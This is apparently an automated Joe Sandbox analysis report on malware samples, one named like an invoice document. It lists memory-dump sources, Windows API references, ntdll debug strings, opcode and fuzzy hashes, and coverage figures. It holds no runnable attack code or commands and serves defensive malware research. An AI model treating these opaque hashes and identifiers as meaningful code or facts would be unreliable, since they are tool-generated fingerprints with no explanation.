                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 0177031E
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017702E7
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017702BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 01777BAC
                                                                                                                                • RTL: Resource at %p, xrefs: 01777B8E
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01777B7F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0177728C
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 017772C1
                                                                                                                                • RTL: Resource at %p, xrefs: 017772A3
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01777294
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                APIs
                                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0178CFBD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallFilterFunc@8
                                                                                                                                • String ID: @$@4Cw@4Cw
                                                                                                                                • API String ID: 4062629308-3101775584

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:40
                                                                                                                                Total number of Limit Nodes:4

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 010BD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 010BD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: efe661c9a7c38f2fe2027291d460350395e20ea49803e75d0df9c7c3d423ab6d
                                                                                                                                • Instruction ID: c27148e3fa9abc460e548e4fc718077428e3d84dfa5e9a97389cf03360809054
                                                                                                                                • Opcode Fuzzy Hash: efe661c9a7c38f2fe2027291d460350395e20ea49803e75d0df9c7c3d423ab6d
                                                                                                                                • Instruction Fuzzy Hash: 685176B09013499FEB44CFA9D588BDEBBF1FF88318F208459E108A7350DB745845CB61

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD0BE
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 010BD0FB
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 010BD138
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 010BD191
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: a989467eba63d7ee896d012be1dfcc3d381d40c627c405eb52dbbeaf5ec56ec9
                                                                                                                                • Instruction ID: 6918301006e3dae60f1136b9cf5a47e902714a6bf20ce820e36126322c179292
                                                                                                                                • Opcode Fuzzy Hash: a989467eba63d7ee896d012be1dfcc3d381d40c627c405eb52dbbeaf5ec56ec9
                                                                                                                                • Instruction Fuzzy Hash: 7E5177B09013499FEB54DFA9D948BEEBBF1FF88318F208459E109A7350DB746884CB65

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 010BAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 838b7fcdb9898be7d2edf2ee2d81bc02d621bf84bb88d7e16e0869bbb9dd99b5
                                                                                                                                • Instruction ID: 4987371b9923132ba75ac5b2d7bc29bfad69fae5f90a27ba4b3951adf158dd55
                                                                                                                                • Opcode Fuzzy Hash: 838b7fcdb9898be7d2edf2ee2d81bc02d621bf84bb88d7e16e0869bbb9dd99b5
                                                                                                                                • Instruction Fuzzy Hash: 28711170A00B05CFE764DF6AD48179ABBF1BF88304F008A6DE59AD7A40DB75E845CB91

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010B59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 1c1d091d0f5a07ff1f8ef3ef847d15e6f3ca81b51611ad8c2623584186d374fc
                                                                                                                                • Instruction ID: b31b11a8352e67580db1495eaa1b7feb9e71e1b830c7907aaec987acc0925617
                                                                                                                                • Opcode Fuzzy Hash: 1c1d091d0f5a07ff1f8ef3ef847d15e6f3ca81b51611ad8c2623584186d374fc
                                                                                                                                • Instruction Fuzzy Hash: F541DFB0C00719CBEB24CFAAC884BCEBBF5BF49304F60809AD509AB251DB756945CF90

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010B59C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 66f34dc13224b12b2908f282ae619a8600c7d5675e272c6a7d0e0a73a14dcb10
                                                                                                                                • Instruction ID: 15ebc0758fcc9dd1bab4ac75fc817259906323c500f0965e13cacb5599fad1ef
                                                                                                                                • Opcode Fuzzy Hash: 66f34dc13224b12b2908f282ae619a8600c7d5675e272c6a7d0e0a73a14dcb10
                                                                                                                                • Instruction Fuzzy Hash: D741EEB0C0071DCAEB24CFAAC984BDDBBF5BF89304F60809AD508AB251DB756946CF50

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 49ddf47c8ab7f8db9b94a666e8fb2b25ea8c0263017629a92a87766e0ccf81da
                                                                                                                                • Instruction ID: cada0fec5e0e838a798461b91b5cdcddf4d7abc31361b7411dec26d3497b0a1d
                                                                                                                                • Opcode Fuzzy Hash: 49ddf47c8ab7f8db9b94a666e8fb2b25ea8c0263017629a92a87766e0ccf81da
                                                                                                                                • Instruction Fuzzy Hash: E531C0786403848FE318EF61F4957693BB2F784710F10812AE9A18F7C8CAFA1845CF10

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 50b14cacf44f49a0cd1b44d5f64bcb812fd19b5f75b6e8d5bfef8d961026c4ce
                                                                                                                                • Instruction ID: 68780a3b0993f45122f7c56b18d3ca1f2f944ddd776417eb65ee4542a54272ba
                                                                                                                                • Opcode Fuzzy Hash: 50b14cacf44f49a0cd1b44d5f64bcb812fd19b5f75b6e8d5bfef8d961026c4ce
                                                                                                                                • Instruction Fuzzy Hash: 8521E3B59002499FDB10CF9AD984ADEFFF4FB48324F14841AE958A7210D374A954CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010BD717
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 5b90feea75e0eecd26ad719e71c12a726a4721036da85a87d0132a5637c80178
                                                                                                                                • Instruction ID: 18b9da5250322dd60e1bdc7072292f23dccc88513b6ab1985df13a2a6995e285
                                                                                                                                • Opcode Fuzzy Hash: 5b90feea75e0eecd26ad719e71c12a726a4721036da85a87d0132a5637c80178
                                                                                                                                • Instruction Fuzzy Hash: F121E3B59002499FDB10CF9AD984ADEFBF4FB48324F14841AE918A3210D374A954CFA0

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 010BAFFE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2340403513.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_10b0000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <N`
                                                                                                                                • API String ID: 0-4051224117

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9296b95c7becba435f9160ad7fe4d58d4d80128b32609727ecc45f763948b57e
                                                                                                                                • Instruction ID: b70460a50ef407ad005295bfa1457bc0ec57b33a6687a0a9e237df13aec59207
                                                                                                                                • Opcode Fuzzy Hash: 9296b95c7becba435f9160ad7fe4d58d4d80128b32609727ecc45f763948b57e
                                                                                                                                • Instruction Fuzzy Hash: E231B470B0D3948FD7565778A82836A3FF6EB87210F0584ABE546CB2D3C9684C09C762
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7b0e2aeee12aecaa58bd0e97dc1aec1eae208f150a121a02b497f1dbcef8de6b
                                                                                                                                • Instruction ID: 2a20ced8419e4b59a8cbbc5b45a32511c2f2b4e7be5fad1b05aeb06e667729ad
                                                                                                                                • Opcode Fuzzy Hash: 7b0e2aeee12aecaa58bd0e97dc1aec1eae208f150a121a02b497f1dbcef8de6b
                                                                                                                                • Instruction Fuzzy Hash: 9031D6B4E052088FDB44DFE6C9546EEBBB6BF89300F14C02AD81AAB354DB755946CF80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 710e3dfc810dd5fddb44f4f7800a1e2884349671f8393124814ab8398b7385d7
                                                                                                                                • Instruction ID: e6827499a90008d50bc9bab6e51c54daac02d8b71cda1af1e94b29c570adf9b0
                                                                                                                                • Opcode Fuzzy Hash: 710e3dfc810dd5fddb44f4f7800a1e2884349671f8393124814ab8398b7385d7
                                                                                                                                • Instruction Fuzzy Hash: CE31E7B4E052088FDB44DFE6C9546AEBBB6BF89300F10C02AD819AB354DB755946CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d56c12a8f33c983ecd98ddb5bab3af80baa6de45dcac5baa247c311b6c059c6c
                                                                                                                                • Instruction ID: 5c9a510d2327684723209069fa4b57307ce4faa17b54bd214ebead63beafb09b
                                                                                                                                • Opcode Fuzzy Hash: d56c12a8f33c983ecd98ddb5bab3af80baa6de45dcac5baa247c311b6c059c6c
                                                                                                                                • Instruction Fuzzy Hash: EF31E475D0A298CFD794CB6EC440ABFBBF2FB46301F0081AAD8259B241D735D501DBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9981592289b18e5f8f8da49cd717b77f92ad1ec7e9e0e029946050c6e2a3b6fa
                                                                                                                                • Instruction ID: 361169f2d3358c859d42b45b0c164f180f1ec5898765e0a21d0f22632400b6ae
                                                                                                                                • Opcode Fuzzy Hash: 9981592289b18e5f8f8da49cd717b77f92ad1ec7e9e0e029946050c6e2a3b6fa
                                                                                                                                • Instruction Fuzzy Hash: 8121B570B042188FD7486B79E42873E3BE6EB85311F14852AE607CB385DE799C16C751
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0d332ba219e48bd1071e3981992d28cf7b2dbcf58124699e88af378d6d55bc7e
                                                                                                                                • Instruction ID: 0a8fe0a9f072c77beb8fa22e2acf6efaeba387bddb6bcb0bfc1182910a7a26c9
                                                                                                                                • Opcode Fuzzy Hash: 0d332ba219e48bd1071e3981992d28cf7b2dbcf58124699e88af378d6d55bc7e
                                                                                                                                • Instruction Fuzzy Hash: 67215175A002058FCB44DF79C8848EEBBB5FF892007144669E805EB352EB74AE49CBA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ac478352de5263f1875e63dba54b51569e91fd34580e8ddd52e39f236a75c2e5
                                                                                                                                • Instruction ID: 4dffe2debb6359f6e3118e549df604611c7e9c2caae27b4e72ff9a2359b439fa
                                                                                                                                • Opcode Fuzzy Hash: ac478352de5263f1875e63dba54b51569e91fd34580e8ddd52e39f236a75c2e5
                                                                                                                                • Instruction Fuzzy Hash: 67218E35F006098FCB41EB68D8446EEB7F4EF89310F00456AE419E7210EB749A85CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2338999527.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_fad000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 942ddf2545601ea8dd3e02daf7e1192d6727d5fb6d2f4bbb754e406dad7922e8
                                                                                                                                • Instruction ID: 5fa2efa890034163c17d5e5846c7c6b2a157245d6819e9d078c03fb2d63fe1b1
                                                                                                                                • Opcode Fuzzy Hash: 942ddf2545601ea8dd3e02daf7e1192d6727d5fb6d2f4bbb754e406dad7922e8
                                                                                                                                • Instruction Fuzzy Hash: 2E2128B6504304DFDB04DF14D9C0B26BF65FB99324F20C16DDD0A0B656C336E856EAA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2338999527.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_fad000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ee05df25dbfaa20a739ffade821377aa3fa6c6f171f8714df7461b0e2ee23071
                                                                                                                                • Instruction ID: f604ea894d053de553edc799d270d14b46268e41edc10af9bcbbd42742d17f77
                                                                                                                                • Opcode Fuzzy Hash: ee05df25dbfaa20a739ffade821377aa3fa6c6f171f8714df7461b0e2ee23071
                                                                                                                                • Instruction Fuzzy Hash: 0B2148B6900240DFCB04DF14D9C0B26BF65FB88328F28C569E90A0B656C336D816EBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4c9ea2fdd198538230b4bfbbe973cf091899b6647b3a5a8c6e30fb3117686628
                                                                                                                                • Instruction ID: 4cccaddb094574041be8dc19feba110442af7fa9930ad50ff25f82a35a35f466
                                                                                                                                • Opcode Fuzzy Hash: 4c9ea2fdd198538230b4bfbbe973cf091899b6647b3a5a8c6e30fb3117686628
                                                                                                                                • Instruction Fuzzy Hash: 8921263AF006168FDB22DF7988801FEB7B1EFC6610F04853FD045AB251DB789A429791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2355566199.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_6c10000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9e26efb8705648f62dcc95d991b3991265a41277613302a8feed5d2a709d5cad
                                                                                                                                • Instruction ID: 99e7fa473959d371e8edc7483e1f9b47d4ae1cdb494d1b940b377b6d67400ff5
                                                                                                                                • Opcode Fuzzy Hash: 9e26efb8705648f62dcc95d991b3991265a41277613302a8feed5d2a709d5cad
                                                                                                                                • Instruction Fuzzy Hash: 0F21F4B4D05209CFDF45CFE4C8809EDBBB6FF4A300F20416AD919AB216C7316946DB90
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000C.00000002.2339414684.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_12_2_fbd000_dpqsbGoWdXlp.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
